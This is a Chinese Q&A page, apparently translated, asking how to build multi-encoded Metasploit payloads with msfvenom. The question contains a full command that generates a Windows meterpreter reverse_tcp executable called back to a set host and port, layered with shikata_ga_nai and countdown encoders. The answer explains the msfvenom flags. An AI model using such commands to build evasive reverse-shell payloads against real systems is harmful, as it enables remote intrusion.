如何使用metasploit生成多编码有效负载

时间:2015-08-13 07:54:13

标签: metasploit

在以前版本的metasploit中,我们可以使用此代码生成多编码有效负载:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.217.133
LPORT=444 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 8 -t raw | msfencode -e x86/shikata_ga_nai -c 9 -t exe >payload.exe

但在新版本中更换了msfvenom ... 我如何通过msfvenom制作多编码有效载荷? 抱歉英文不好

1 个答案:

答案 0 :(得分:0)

你可以通过“msfvenom”在你的脚本中“替换msfpayload和msfencode”

和“-i”而不是“-c”表示迭代次数或编码有效负载的时间

您可以输入您的终端

msfvenom

msfvenom -h

如果你知道msfpayload&编码,你应该能够毫无困难地使用msfvenom,同样的机制

有关详情,请参阅

https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom

你找到你要找的东西了!